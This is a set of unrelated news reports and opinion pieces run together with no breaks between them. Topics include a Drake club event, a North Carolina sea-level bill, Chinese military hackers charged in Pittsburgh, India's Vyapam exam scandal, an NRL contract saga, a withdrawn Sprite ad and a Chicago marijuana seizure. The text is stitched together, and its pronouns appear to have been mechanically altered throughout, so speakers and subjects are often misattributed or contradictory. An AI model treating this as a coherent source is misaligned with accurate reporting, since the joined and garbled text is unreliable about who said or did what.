Earlier this month , Drake announced a mysterious new event called “ The Ballet , ” indicating it 'd take place in Houston on September 5 . They billed it as a “ new dance experience , ” offering few details beyond the date and location . At the launch last night , they revealed a little more : “ The Ballet ” is a new club opening early next year in Houston , and last night 's pop-up event was just a preview . On Instagram , they wrote , “ Treat yourself do n't cheat yourself . Where the women are on a pedestal and the surroundings are unforgettable. ” At the event , they said the city has a culture of “ dancing and it 's not about no strip club shit . It 's about these amazing women that we 've got in one spot , this music we 've got , this Houston culture that we got . And I just wan na let you know that , me , I 'm going to bring it to you in the most honest and genuine way possible. ” See the Instagram post below , as well as video from the event , in which Drake MCs to a roomful of fans and scantily-clad dancers , occasionally raining down bills .
Last night , Drake also appeared at OVO Sound signee dvsn 's “ Sept 5th Live ” event in Houston . Scroll down to see them perform “ Faithful ” together , via Complex . The events were part of Drake 's annual Houston Appreciation Weekend ( HAW ) , which concluded its second year yesterday .
Loading Loading
Loading Loading
The history of governments meddling in the practice of science is not a good one . The most infamous case is that of Lysenkoism -Stalin backed the ideas of Trofim Denisovich Lysenko who believed in the inheritance of acquired characteristics . Their ideas became of the official sanctioned science of the Soviet government . Genetics was declared a “ bourgeois science , ” or “ fascist science , ” and many geneticists who disagreed with Lysenko were executed or sent to labor camps . Execution tends to have a chilling effect on the free exchange of ideas and the practice of science . Over seven decades later genetic science in Russia is still lagging behind .
In the US we have a similar problem – not the Gulag , but political factions that disagree with certain findings of science that are ideologically inconvenient for them . The two biggest issues being targeted ( but certainly not the only ones ) are evolution and climate change . Much of the focus has been on what should be taught to students in science class ( my vote is for science ) .
Recently the North Carolina legislature proposed House Bill 819 to study the effect of climate change on sea levels , and therefore coastlines . For some reason the legislators felt the need to include in the bill specific restrictions on how the science can be done . Section 2 includes this line :
These rates shall only be determined using historical data , and these data shall be limited to the time period following the year 1900 . Rates of sea-level rise may be extrapolated linearly to estimate future rates of rise but shall not include scenarios of accelerated rates of sea-level rise .
Apparently being elected to the State House of North Carolina invests politicians with superior knowledge ( to actual scientists who work in the field ) as to the proper way to model future trends . Extrapolating current trends into the future is always tricky . The very heart of any such extrapolation is to know what the mathematical trend is . There is a tendency to assume a linear extrapolation , but that is usually not the case .
The problem with linear extrapolation of trends is that often we are looking at a small part of the slope of a complex and changing phenomenon , and there is no justification for assuming that current short term trends will hold up in the long term . Usually this takes the form of , “ If current trends continue ( linearly is often assumed ) , then in X amount of time something horrible will happen. ” However , we may just be looking at a ups and downs of a cycle , which is only apparent when longer term data is looked at .
Further , there are often game changers that alter the factors involved in creating the trend . Systems reach saturation points , compensatory mechanisms take hold , technology advances , and times change .
On the other hand , some systems have feedback loops that can actually increase the rate of change over time , so the trend is not linear but geometric or exponential . If in 1960 you tried to predict what computer technology would look like in 2012 by extrapolating linearly from advances so far , your estimates would be off by many orders of magnitude . Advances in computer technology have been geometric , doubling roughly every two years , or 18 months if you believe Intel ( a phenomenon known as Moore 's law , which specifically referred to the density of transistors on computer chips ) .
What is the proper way to mathematically model future changes in sea level based upon recent climate data ? That is a highly technical scientific question best left to those with expertise in this area . Climate has many feedback loops and game-changing consequences that need to be taken into account . How this all works out is a legitimate matter of scientific debate , and there are many viable models . Here is a good discussion of the issue , specifically relating to the recent IPCC report on sea level change . They discuss a number of different scenarios , producing predictions of sea level rise by the end of the century between 18 and 59 cm . The extrapolations are all fairly conservative , in that they in fact rely on some linear extrapolations of some things like the flow of ice from Greenland . They acknowledge that this can dramatically change , and may even slow , or the glaciers may rapidly slide off into the North Atlantic , changing all predictions of sea level rise .
The North Carolina bill does more than dictate how publicly funded scientists may extrapolate future trends , they also dictate that they may only use historical data . In other words , they can not use climate models – they ca n't use any actual scientific understanding of climate and the forces at work that can affect climate . They must take a simplistic approach of extending the line from historical data into the future , and they must do it in a linear fashion .
This bill is an amazing combination of ignorance and hubris . It is perhaps an excellent example of the Dunning Kruger effect whereby ignorance renders one unable to detect their own ignorance . Only a scientifically illiterate legislator would be unable to determine how scientifically illiterate this bill is .
PITTSBURGH ( KDKA ) — Investigators released new details today in a cyber-espionage operation that allegedly targeted several United States companies , nearly all of them based in the Pittsburgh area .
Five members of the Chinese military are charged with the crimes .
The FBI held a press conference Tuesday morning with more details on the case .
Federal law enforcement officials call the cyber thefts 21st century burglary .
U.S. Attorney David Hickton and FBI agents revealed more information on the five Chinese military officials accused of hacking into the computers of the local corporations to gain trade secrets .
“ We talk about pipe support documents from Westinghouse ; we talk about emails from the Steelworkers , as well as from Westinghouse . Once that information is located , it 's packaged up and exfiltrated back to China , ” said Assistant U.S. Attorney James Kitchen .
U.S. Steel , Westinghouse and ALCOA are among the affected corporations .
The hackers allegedly stole information on products , along with network credentials , giving them access to sensitive files , according to the investigators .
For employees of those corporations , it could have been as simple as opening an unknown email .
“ The most common vector… is through the spear-fishing mail , said Special FBI Agent in Charge Scott Smith . “ To get somebody to click on a link that will take you to a site that 's compromise , that will download malware , or to open an attachment that has malware attached . ”
Once they got a foothold in a company 's network they allegedly stole thousands of sensitive emails from Westinghouse , along with United steelworker Union strategies related to pending trade disputes .
But the cyber thefts go deeper .
“ What happens is , when these companies have their proprietary designs stolen , or they 're put in the position where they put out a new product that is then met with a flood of below cost , competitive products that may or may not have been stolen and they ca n't compete , what happens is average , ordinary citizens – our friends and neighbors – lose their jobs , ” added Hickton . “ This case is as much about that as the victimization of these companies . ”
Investigators say they are working with the targeted companies and other local corporations on ways to protect themselves from cyber threats .
If brought back to the U.S. , the five Chinese military officials would face trial in Pittsburgh . Experts believe that may never happen , but Hickton believes the indictments are more than justified .
“ This response by law enforcement will exist as long as the threat exists , and if the threat subsides and the behavior stops , then there will be no need for further cases , ” they said .
RELATED LINKS :
Prosecutors : Chinese Targeted Pennsylvania Firms ( 5/19/14 )
More Reports by Bob Allen
Join The Conversation On The KDKA Facebook Page
Stay Up To Date , Follow KDKA On Twitter
Image copyright A Moeed Faruqui Image caption Some 2,530 people have been accused in connection with the scandal since 2012
India 's Supreme Court has ordered a federal inquiry into a massive medical school admissions examination scandal in Madhya Pradesh state .
The Central Bureau of Investigation is expected to take over the inquiry into the Vyapam scandal from state police .
Vyapam is the Hindi acronym for an office that conducts examinations for government jobs and medical school admissions in the state .
The scandal involves thousands of arrests and many mysterious deaths .
Opposition parties have accused the BJP-ruled government in Madhya Pradesh of influencing the investigation and have been demanding a federal inquiry .
While ordering the inquiry , the Supreme Court judges criticised the Madhya Pradesh high court for refusing to take a decision on whether there should be a federal investigation into the scandal .
Image copyright A Moeed Faruqui Image caption A number of students have been held in connection with the scandal
`` Instead of taking a decision , the Madhya Pradesh high court washed its hands off [ the case ] and put the ball in our court , '' the judges were quoted as saying by the NDTV news channel .
The scandal involved leaking question papers , rigging answer sheets and hiring bright students as impersonators to sit for candidates , as well as selling medical school seats to the highest bidder . Anything between 1m rupees ( $ 15,764 ; £10,168 ) and 7m rupees was paid for a seat , correspondents say .
Some 2,530 people have been accused in connection with the scandal since 2012 .
Police have arrested about 1,980 people and 550 people are still being sought . Twenty courts in Madhya Pradesh are looking into 55 cases registered in connection with the scandal .
In a mysterious twist , some 33 people - mostly accused in connection with the scam - have died in the past two years , raising suspicions of foul play . It is not clear how many deaths are linked to the scandal .
In fact , I think most of you are questioning the wrong people . From where I sit , it 's not DCE who backflipped here . It was the Manly club that backflipped . DCE eventually signed with the club they wanted to play with all along . If they did n't really want to stay at Manly , why would they even contemplate subjecting themselves to the public abuse they knew he 'd receive once they turned their back on the Gold Coast contract ? DCE is a Manly player , they made their NRL debut for Manly , they represented Queensland and Australia thanks to Manly ; at the end of the day , it 's probably right that they should remain playing for Manly . In fact , I do n't think DCE ever really wanted to play for anyone else . Instead of hurling abuse in the direction of DCE over their supposed backflip , perhaps you should be questioning how it came to be that the Manly club has ended up having to offer a record eight-year , $ 10m contract to keep one of their brightest young stars , when the kid always wanted to stay at the club in the first place ? Remember this : Cherry-Evans agreed to terms on a new four-year contract with the previous Manly management in August , for an amount of money much less than the new record deal they just signed .
Before a contract could be presented for signing , the management and ownership structure at the Sea Eagles changed . First order of business for the new regime was to decide not to recognise the deal DCE had negotiated with the previous bosses . They instead offered them a different deal , for an amount significantly less than the one to which DCE originally agreed . Now , please hold onto that thought for a moment , because if the revised offer last October was significantly less than the deal DCE agreed to in August , then it 's in a different stratosphere to the deal this same management and ownership have now thrown at them to convince them to stay . DCE was disappointed at this bizarre change of events , however , they wanted to remain at Manly and their management entered into a new and lengthy negotiation process . This negotiation ends earlier this year when Manly again pulled the offer off the table . Why did they pull this offer off the table ? Because they had decided they would throw all available resources at keeping DCE 's fellow playmaker Kieran Foran . Why ? Hmmm ... For the answer to that question you probably need to interview a number of people . Anyway ... At this point DCE is now left with only one real alternative , that being a sizeable offer to join the Gold Coast Titans . Reports that DCE had also received an offer from the Cronulla Sharks are somewhat inaccurate because , for whatever the reason , the Sharks never at anytime tabled their offer in writing , despite several requests to do so . Gold Coast was the only `` hard-copy '' offer on the table .
It 's a big decision for DCE to move from Manly to the Gold Coast . They have to relocate themselves and their family . It 's not like signing with Parramatta where they could 've just car-pooled from the northern beaches to the golden west of Sydney with teammates Anthony Watmough and Foran . But as this is the only creditable offer available , DCE signed with the Titans . It 's also a big deal for the Gold Coast . It 's a massive amount of money to be paying one player , however , DCE is seen as a marquee signing who can win games on the field and hopefully lift the club 's profile off the field by capturing the hearts and minds of the locals . But , it 's still not a deal just yet . All clubs know that when you sign a player for the following season , prior to round 13 of the current season , you can not register that contract until after round 13 . Why ? I do n't know . It 's just another of those knee-jerk , policy-on-the-run , over-reactive , poorly constructed rules , synonymous with the type of haphazard policy implementation of the former NRL management . Instead of bagging DCE , you should be questioning the fact the round 13 backflip rule even exists . What a stupid rule ! The fact that current NRL management has n't bothered to address this ridiculous situation despite the numerous instances in previous years of players doing backflips is another matter .
The round 13 rule is in place and we are all aware of the rule . In effect , your contract with the player means nothing until such times as the contract is recognised and registered by the NRL . Actually , that would make for an interesting legal debate . Imagine you and I enter into a legally binding contract . However , its validity depends on whether the contract will be recognised by a third person , who themselves are not party to this contract ? If Gold Coast and Manly presented their contracts to a magistrate in the court of law , I wonder which contract would be upheld . Interesting . Anyway , I digress . The Gold Coast knew this could happen . They are big boys and they 've taken it on the chin . All credit to them . They have carried themselves with great dignity . It 's not the end of the world . They will survive . Meanwhile , back on the northern beaches , Manly 's management now turned all attention to retaining Foran . Unfortunately for Manly , Foran 's heart now belongs to another and they accept a contract offer with the Parramatta Eels to play under former coach Brad Arthur . OK. Now Manly has a problem . They 've lost their two outstanding young playmakers . Their other star players are approaching midnight so far as their careers are concerned . Club depth is poor . Little or no future planning has existed for some time . What do they do ?
Enter Bob Fulton . Bozo is recruited to fix the mess . They are a winner . They are a leader . They make decisions and makes things happen . Bob decides they need to rebuild the club around their best young player , who just so happens to be DCE , the kid who just signed with the Gold Coast . Remember too that Manly has already pulled two offers off the table in previous negotiations and there were those within the club who had gone out of their way to make DCE feel very unwelcome . To Bob , that 's not a problem , just a challenge . The solution ? Communicate with DCE and treat them with the respect they deserve . Two years ago Manly should 've seen the writing on the wall . The club had enjoyed a remarkable run of success and one of the best eras in the club 's history . But nothing lasts forever . Success had increased player values and it was stretching their salary cap to the limit . They should 've bitten the bullet and pulled in their older players and said `` Guys , it 's been great . We love you and will love you forever , you will all be in our Hall of Fame one day , but for now we need you to move on and get yourselves some big contracts somewhere else . We need to start building our next great footy team '' .
They should then have brought in DCE and Foran and said `` you guys are our future . We are going to build our club around you two . You have learned your football under our great senior players . Now it 's time for you two guys to educate the next generation . Here 's a nice five year deal each . Let 's get cracking '' . Job done . Yes I know it 's hard for clubs to take such hardline strategic measures . Emotion gets the better of everyone . The fans fall in love with their favourite players . The media criticises what it does n't understand . Who needs the angst , right ? The result though is that they lost Foran , nearly lost DCE , and the development of their team has been on hold for two seasons . Manly now sits last on the premiership ladder and have a real mountain to climb . It 's the Manly club that needs to learn from this experience . They could 've had both kids locked up long ago , for long term , for a fraction of the cost . As for DCE ? Well , Get off their back . It 's just business baby .
Think about it . Last October Manly reneged on a four-year contract . Earlier this year , they pulled another contract offer off the table , virtually forcing to leave the club . Now DCE has themselves a new eight-year contract at significantly more money . Boy , they really got them down on one knee , did n't he ? Congratulations young man . May they all live together happily ever after . Well , for the next eight years anyway .
Image copyright Twitter
`` She 's seen more ceilings than Michelangelo '' ; `` You 're not popular , you 're easy '' .
Brutally refreshing ? Or just brutal ? Coca-Cola sparked a stinging reaction on social media with the latest instalment of an advertising campaign for the soft drink Sprite , prompting the drinks giant to apologise and pull the ad .
The campaign , which uses the hashtag # BrutallyRefreshing , was launched in Ireland earlier this year and aimed at a mainly male audience .
It said it was `` celebrating those with guts to tell it like it is '' .
Some of the previous `` truths '' used included :
`` We all have one tight friend ''
`` One dip is never enough ''
`` If you have to give your taxi driver directions , you 're better off walking ''
But the campaign came in for harsh criticism when this particular advert appeared on the Irish website JOE.ie .
As well as the phrases about ceilings and popularity , it read , `` A 2 at 10 is a 10 at 2 ! ''
Louise McSharry , a radio presenter from Ireland 's RTE 2fm , posted a picture of the advert to their followers on Twitter .
Image copyright Twitter
One Twitter user , Emma Turley , responded : `` Someone actually approved this awful , misogynistic advertising campaign ? ''
Another , Bob Churchill , said : `` A marketing firm convinced itself & @ CocaCola that * abstract slut-shaming * was the way to go ? ! # BrutallyRefreshing . ''
Some Twitter users added the hashtag # everydaysexism , and one called Siobhan said : `` What would be # BrutallyRefreshing @ Sprite is you dragging your marketing into the 21stC an unreserved apology + a massive donation to charity . ''
The editor of JOE.ie , Paddy McKenna , said the advert was entirely at odds with their site 's messages about the treatment of women .
`` Anyone who has read the site knows that this does not reflect JOE 's brand values . It should n't have been there and it was removed as soon as it was flagged , '' they said .
A Coca-Cola spokesperson said : `` We 're sorry for any offence caused by the # BrutallyRefreshing Sprite campaign in Ireland , which was intended to provide an edgy but humorous take on a range of situations .
`` Since its introduction in Ireland , Sprite has been associated with individuality and self-expression and we have always been committed to ensuring we deliver the highest standard of advertising .
`` We recognise that on this particular occasion the content did not meet this standard and we apologise . The campaign has now come to an end and the advert in question will not appear again . ''
Produced by Andrew Alexander , BBC Social and UGC Team
In an interview with Sunday newspaper Real News , the Greek government 's Vice President and Foreign Minister , Evangelos Venizelos expressed their confidence that Greece is ready to prevent a possible incident with Turkey if things get out of hand .
“ We are ready to prevent the possibility of an incident with Turkey . We are implementing actions to prevent an escalation , because a military escalation has never helped the region or Greece , ” Mr. Venizelos underlined . In addition , the Greek government Vice President , declared that it is one thing to say that the country has a strong defense that it will make use of if needed , and it is quite another thing to enter into a crisis , “ that has no prospects , has no strategic framework and often hurt a country and eventually become permanent and freeze. ” They stated .
On Wednesday , Mr. Venizelos warned the Turkish government that the Greek side is ready to take legal actions if necessary to protect Cyprus ' sovereign rights . “ Our reaction is , so far , strong political , but it can also acquire legal characteristics . Greece in all tones , has explained that neither the tripartite agreement between Greece , Cyprus and Egypt nor that between Greece , Cyprus and Israel are of an aggressive nature and do not turn against any of the neighboring countries , ” they said , defending at the same time Cypriot President Anastasiades ' decision to withdraw from the inter-communal talks under the United Nations for a solution to the Cyprus problem until Ankara ceases the provocations in Cyprus ' Exclusive Economic Zone ( EEZ ) .
The European Parliament has passed on a joint resolution , condemning Ankara 's violations in Cyprus ' EEZ , which the Turkish Cypriot side characterized as “ unacceptable ” and “ one-sided . ”
Tension is high in the southeast Mediterranean , since last month , when Turkey sent seismic vessel “ Barbaros ” to Cyprus ' EEZ Block 3 in order to conduct hydrocarbon research , while dogfight incidents over the Aegean sea between Turkish and Greek fighter jets have increased .
The University of Kent 's hackerspace , TinkerSoc , recently had a talk on software-defined radio using an incredibly inexpensive USB TV tuner . Of course this is nothing new to Hackaday readers , but they did manage to build one of the best antennas for their TV dongle . It 's a discone antenna , and is perfectly suited for tuning into a whole bunch of really cool things such as weather balloons and aircraft transponders .
The idea discone antenna looks exactly like its namesake ; a metal disk attached to a metal cone . Of course with the frequencies the RTL software-defined radio deals with , it 's rarely necessary to build antennas out of sheet metal . The team at TinkerSoc built their discone out of galvanized garden wire and attached it to the input of their TV tuner .
All the dimensions for their discone antenna were gleaned from [ ve3sqb ] 's antenna design programs . Since TinkerSoc designed their antenna for 110 MHz , it ended up being pretty large . For higher frequencies , though , a discone antenna become fairly small and more than portable enough for a mobile rig .
LONDON ( Reuters ) - “ X Factor ” guru Simon Cowell has become the latest big name in showbusiness to suffer an expensive pratfall in London 's West End with the announcement on Monday that the musical “ I Ca n't Sing ! ” which they co-produced will close after a six-week run .
Judge Simon Cowell attends a panel for the television series `` The X Factor '' during the Fox portion of the Television Critics Association Summer press tour in Beverly Hills , California August 1 , 2013 . REUTERS/Mario Anzuoni
The demise of the musical parody of the TV talent contest , which reportedly cost 6 million pounds ( $ 10 million ) to produce , comes hard on the heels of the closures of musicals by long-time West End and Broadway hotshots Tim Rice and Andrew Lloyd Webber .
It also follows the expensive fiasco in 2012 of a musical based on the Spice Girls pop band .
The closure of “ I Ca n't Sing ! ” , which featured a talking dog and portrayed Cowell as a megalomaniac , was announced on the show 's website and was also tweeted to its followers .
“ Stage Entertainment and Syco Entertainment , the producers of ‘ I Ca n't Sing ! ' at the London Palladium , have announced the closure of the production on Saturday 10th May 2014 , ” the statement on the website said .
“ The show received a series of rave reviews and standing ovations from thousands of theatre-goers following its opening earlier this year . ”
Despite reviews praising the show 's irreverence , it struggled to fill one of the West End 's largest theaters , and on some nights a hoarding outside advertised the availability of choice seats for only 20 pounds just before curtain time .
“ The West End can be an unpredictable place as the closure of a number of high-profile productions recently has shown , ” said Rebecca Quigley , the CEO of Stage Entertainment .
“ ‘ I Ca n't Sing ! ' has had audiences on their feet night after night , four and five-star reviews from the critics and an amazing company and creative team , but it seems that is n't always enough . ”
The West End and the London stage in general have been celebrating a successful period for ticket sales . Last year was a record for revenues and attendances , with more than 14 million theatre-goers and gross sales of over 585 million pounds , according to the Society of London Theatre .
But despite that there have been some major casualties .
Lloyd Webber 's “ Stephen Ward ” , based on the 1960s Profumo sex scandal , closed after a run of less than four months .
Their erstwhile lyricist Rice 's “ From Here to Eternity ” , based on the James Jones novel about the Japanese attack on Pearl Harbor , closed the same day as Lloyd Webber 's show after a six-month run .
( $ 1 = 0.5948 British pounds )
Get the biggest daily stories by email Subscribe Thank you for subscribing See our privacy notice Could not subscribe , try again later Invalid Email
Leaflets have been posted on cars in east Belfast threatening people who give information to the PSNI .
The flyers , with the image showing a gunman imposed over a Union flag , were put on cars between Friday night and Saturday morning , saying “ All PSNI informer will be put out of this area . ”
The Alliance Party leader condemned those behind the incident and branded the message “ disgusting . ”
MLA Chris Lyttle also condemned the production and distribution of the leaflets calling it a direct act of intimidation against the local community .
They said : `` Once again we see faceless people using the cover of darkness to make threats against the community .
`` It is however , vital that people continue to provide support and information to enable the PSNI to keep our community safe .
`` I would urge anyone with any information about the production and distribution of these leaflets to pass it to the police on the 101 number or anonymously to the Crimestoppers charity on 0800 555 111 . ''
MORE : Harland and Wolff seals wind farm contract supporting 200 jobs
MORE : Belfast caught up in a heroin epidemic , drugs expert says
A convicted jihadist serving a life sentence in federal prison as the “ 20th hijacker ” in the September 11 , 2001 , attacks on the U.S. homeland has reportedly offered to testify during the 9/11 trial to “ expose the Saudi Royal double game with ” the late al-Qaeda leader Osama bin Laden .
Their offer comes as hundreds of families have filed a lawsuit that , unlike others , contains a detailed account of Saudi Arabia 's role in the 9/11 attacks .
“ I am willing to fully testify on the 9/11 case , even if I was charge on the death penalty case as it incriminate me , ” Zacarias Moussaoui , self-identified as “ Slave of Allah , ” said in broken English in a hand-written letter .
“ My take is they would like to be in the spotlight and is bored in solitary , ” Edward MacMahon , the terrorist 's former defense attorney told the Miami Herald .
In response to their allegations , the Saudi Embassy has labeled the French-born U.S. prisoner as a “ deranged criminal . ”
Besides “ Slave of Allah , ” they also sign their filings as an “ Enemy Combatant , ” which they reportedly are not .
Currently , the 48-year-old Moussaoui is serving life behind bars at the SuperMax prison in Florence , Colorado .
The jihadist pleaded guilty in federal court to six 9/11 attacks-linked conspiracy charges in 2005 .
According to the Pentagon 's war court website , Moussaoui has written at least three times to Army Col. James L. Pohl handling the September 11 mass-murder case , which still has no trial date .
Judge Pohl has not confirmed receiving the terrorist 's letter , noted the Herald .
“ One of their defense lawyers , Gerald Zerkin , described Moussaoui as ‘ a compulsive letter writer ' who sent perhaps 300 letters to U.S. District Court Judge Leonie Brinkema , who handled their trial , ” adds the Miami Herald .
Moussaoui 's request for an opportunity to expose the Sunni Saudi kingdom 's ties to bin Laden comes as a new lawsuit has surfaced claiming the Saudis provided material support to al-Qaeda , a claim to which the jihadist is no stranger .
The lawsuit claims the Saudi kingdom enabled al-Qaeda to kill the estimated 3,000 people on American soil on 9/11 .
New York Daily News reports :
The Manhattan Federal Court lawsuit , filed Monday by more than 800 victims ' families , provides extensive accusations about the Gulf nation 's complicity — such as by bankrolling the attack . Saudi Arabia “ actively supported al Qaeda in its final preparations for the September 11th attacks , ” court papers contend . And the country did so “ through a network of the kingdom 's officers , employees and/or agents who met with and aided the hijackers , providing them with money , cover , advice , contacts , transportation , assistance with language and U.S. culture , identification , access to pilot training and other material support and resources , ” the suit charges .
In the latest letter sent to the military judge presiding over the 9/11 attacks , dated January 29 , 2016 , the imprisoned jihadist offers to testify about the “ real ” mastermind behind the attacks .
They then names “ Saudi Prince Turki , Princess Haifa , and a man identified only as Omar , ” the lightly redacted letter shows .
The U.S. has identified Khalid Sheikh Mohammed ( KSM ) , who is awaiting a death penalty tribunal as the mastermind of the September 11 plot .
Moussaoui “ is just one of several men described as the missing ‘ 20th hijacker ' in the Sept. 11 , 2001 attacks that killed nearly 3,000 people in New York , at the Pentagon and in a Pennsylvania field , ” reports the Miami Herald .
The Flyers may not have won much on the ice this past season , but they finally do have a title they can call their own : ESPN.com 's Best Prospect Pipeline . The BSH Radio crew is here to break down that list , from Nolan Patrick to Matthew Strome . The pipeline 's dramatic improvement under Ron Hextall is discussed , as is the possibility that ( despite the lofty overall ranking ) ESPN may even be underrating some of the kids .
That leads directly into a defenseman-heavy Top 25 Under 25 conversation , as all of Philippe Myers , Sam Morin , and Robert Hagg made appearances on the BSH list over the past week . The gang weighs ceiling versus certainty of contribution with regards to the blueliners , and takes a deep dive into their respective skillsets . After a brief detour into `` will the Bruins trade yet another young star ? '' territory , the show closes out with a Calder Trophy discussion , and whether Flyers prospects are being overlooked in the 2017-18 race .
You can listen below or just about anywhere thanks to iTunes , Google Play , and Soundcloud .
Follow us on Twitter @ BSH_Radio so we can yell at each other about prospects .
Conservationists welcome 49 new species being declared endangered
Posted
The Federal Government 's list of plants and animals on the brink of extinction has been updated with 49 new additions — but far from being outraged , scientists and environmentalists say this is a potentially positive sign for those species .
Key points : Species on list given extra protections under environmental laws but 'many neglected '
No funding to recover threatened species in budget
Expert says it is encouraging to see the list growing from a conservation perspective
It is the biggest single addition to the 15-year-old list since 2009 and represents a 20 per cent jump in the size of the list since this time last year .
Threatened Species commissioner Gregory Andrews said Australia was in the midst of an `` extinction crisis '' .
`` Australia has endured the worst rate of mammal extinctions in the world ... We 've lost 29 mammals in Australia since Europeans arrived , '' they said .
`` Ninety per cent of the animals found here are found nowhere else on Earth . They define who we are as a nation .
`` The yellow-footed rock wallaby for example , is one of 16 wallabies at risk of extinction . We 've already lost eight wallabies to extinction . They 're gone forever .
`` I follow the Wallabies rugby team but we ca n't keep naming our sporting teams after our animals and plants if we lose them to extinction . ''
'So many of our species have been neglected '
Once a species is added to the list , it is given extra protection under Australian environmental laws .
If it is likely to be affected by a proposed development , the proposal must be vetted by the Federal Environment Minister .
Reports on the likely effect on the species must be prepared and potential ways to reduce the impact identified .
A species also should have a recovery plan written for it — but since 2001 , few species have had their recovery plans written , and many of those that were written have expired and not been updated .
`` The department ca n't tell me how many have an up-to-date plan , '' Mr Andrews said .
They said it was a situation they were working to reverse .
`` So many of our species have been neglected . So many of their statuses and recovery plans have sat on shelves , '' they said .
Jess Abrahams , a healthy ecosystems campaigner with the Australian Conservation Foundation , said new funding needed to be found to realise the commissioner 's ambition .
`` To recover threatened species we need dedicated new funding for which there was none in the most recent budget , and we need a dramatic increase in funding to implement the recovery plans that already exist and are being drafted as we speak , '' they said .
Encouraging to see species listed from 'conservation perspective '
Professor Corey Bradshaw , Sir Hubert Wilkins chair of climate change at the University of Adelaide , said the dramatic increase in the size of the list reflected a better understanding of the threats facing Australia 's plants and animals .
`` Much of the updated information in any sort of endangered species list is usually a function of refined information and better data collection as opposed to an actual , real change in the status , '' they said .
`` Because of the policy implications of a species being listed , it 's actually a really good thing from a conservation perspective that we have more species there because it certainly does restrict open-slather development , which has been characteristic of a lot of Australian development over the last 50 years .
`` In a lot of ways it 's encouraging to see the list growing . The [ Environment Protection and Biodiversity Conservation ] Act lists probably only a tiny fraction of the species that are truly in conservation peril simply because of a lack of information . ''
Mr Abrahams agreed , but added a note of concern .
`` In part we 're seeing more species added to the list as we understand more about the threats to our environment ... but we 're also seeing new species added because the Government is failing to do the necessary action , '' they said .
`` Species like the swift parrot or the Leadbeater 's possum have been upgraded on that list — they 've moved from endangered to critically endangered — and that actually shows that the actions that we 're taking are failing . ''
Topics : environmental-policy , environmental-management , endangered-and-protected-species , federal-government , australia
An aerial view of the damage during the first few days of the Onamalutu forest fire near State Highway 6 .
Nelson Forests could face a multimillion-dollar insurance bill after a fire that started on its property destroyed vast tracts of farm and forest land in Marlborough .
The amount is still climbing as surrounding property owners in the Onamalutu area count the damage and firefighters add up the mounting cost of their largest operation in more than a decade .
The perimeter of the rural Marlborough fire that started last week spans close to 600 hectares .
It was discovered over the weekend that the blaze , which is largely under control , began on property owned by Nelson Forests .
Any damage caused by a fire that starts on commercial land is potentially liable to be paid by that company . This included the third-party loss and the cost of fighting the fire , estimated to be at least $ 750,000 . `` Expect it to go up , '' Marlborough Kaikoura principal rural fire officer Richard McNamara said . `` We are still accumulating the cost of the fire line and water tankers - that all has to be accounted for . ''
The blaze was the biggest fire in the region since the Boxing Day fires , which ran across the Wither Hills in 2000 . The total bill including the damage was hard to comprehend but would be in the multimillions of dollars , they said .
`` There are a number of private forestry operations within the fire perimeter , '' McNamara said . `` There is Nelson Forests and large , private lifestyle blocks . It 's a complex mix of land . ''
Nelson Forests managing director Lees Seymour said the company 's liability would depend on how the fire started but they were confident their insurance would cover all the damage .
`` We are all disappointed . No one likes to see occurring on anybody 's properties especially when people 's lives are at risk . We are just thankful nobody was injured and there was no significant loss of property . ''
They said that though it was `` quite a visual event '' the damage sustained on the company 's land was not likely to be that great and much could be salvaged .
Marlborough Mayor Alistair Sowman told Radio New Zealand that better cleaning up of forestry wastage sites was needed to reduce the threat of heat-induced bushfires .
The debris from felled trees , known in forestry as skid sites , can ignite in extremely hot weather . `` They are the major causes of our fires , we need to change the practise quickly . ''
Seymour said the preliminary indication was that this fire did not start in this way . However , the investigation was still underway .
When the cause was discovered the case would become a `` conversation between insurance companies '' as to who paid what .
About 100 firefighters are still deployed .
Incident controller John Foley , of the Marlborough-Kaikoura Rural Fire Authority , estimated that there were three more days of solid work to be done on the ground but it was hoped that responsibility for dealing with the aftermath of the fire could be handed back to Nelson Forests later this week .
Waimea Rural Fire District principal rural fire officer Ian Reade said eight fire crews from the Nelson region were fighting the fire , which meant resources were stretched . They had cancelled 102 permits in the Nelson region last week . `` We went into lock-down mode around here , '' they said . `` We are wary that fire could still make a run . ''
Six railroad cars that traveled from Mexico to Chicago Heights were packed with 11 tons of marijuana in the `` largest seizure ever of marijuana '' in the area , according to the feds .
It looked like any other freight train rolling north along rural railroad tracks . But this one was the Weed Express .
When the six train cars from Mexico pulled into a south suburban Chicago Heights warehouse , federal authorities say they were packed with 11 tons of marijuana in so-called `` super sacks . ''
Seven people are being held on federal charges after being arrested on Wednesday in connection with the shipment , now being billed as `` the largest seizure ever of marijuana in the Chicago area . ''
At a news conference Thursday afternoon in Chicago , federal drug agents said that they calculated the 22,000 pounds of marijuana had a street-sale value of at least $ 22 million .
`` This is a great day for the good guys . Having served time on the border , this is the way it 's supposed to work , '' Jack Riley , Drug Enforcement Administration , said .
In this case , customs and border patrol agents found six cars of a Union Pacific train loaded with the `` super sacks '' at Eagle Pass , Texas , in mid-November . Their shipping documents said they contained titanium pigments from Jalisco , Mexico , and were being imported by a company called Earth Minerals outside Joliet . With the help of a drug sniffing dog , the agents found that the rust colored dust was meant to camouflage the real contents -- 11-tons of marijuana .
`` This was an intense , long investigation , the marijuana was put back in the rail cars and proceeded to Chicago Heights , '' said U.S. Attorney Pat Fitzgerald ..
So when the train arrived in Chicago Heights , agents were waiting and listening and watching as the super sacks of marijuana were unloaded and put in a warehouse .
Seven defendants were arrested . They appeared in court Thursday . They 're all charged with conspiracy to distribute marijuana and remain in federal custody .
`` Suffice to say this is not the end of the investigation . Obviously , we 're rolling from here , '' said Riley .
The sheer size of the operation suggests a sizable organization . Each one of the super sacks weighed 3,000 pounds so they 're not just pitched over the shoulder into a freight car .
The dozens of phone calls monitored at this end by federal agents reveal that the unloading of all that marijuana was no small logistical challenge . Several of the men allegedly involved are recorded talking about making sure they have enough forklifts and sifter machines to separate the pot from its packaging . One of the men is heard in the recording saying , `` 'Save your energy and then go celebrate for two , three days , because you have lots to celebrate , ' '' an official said .
The United States Attorney in Chicago has identified the defendants as : Carlos Osvaldo Quintero , also known as `` Carlos Gomez '' and `` Miguel Dominguez , '' 31 ; their father , Martin Quintero , 63 ; Felipe de Jesus Magana-Campos , aka `` Padrino , '' 47 ; Eduardo Angel Zalayaran-Ruiz , aka `` Other Inge , '' 54 ; Javier Vera , aka `` Ducky , '' 24 ; Christian Gonzalez , aka `` Chris , '' 24 ; and Miguel Cordova , aka `` Mike , '' 20 .
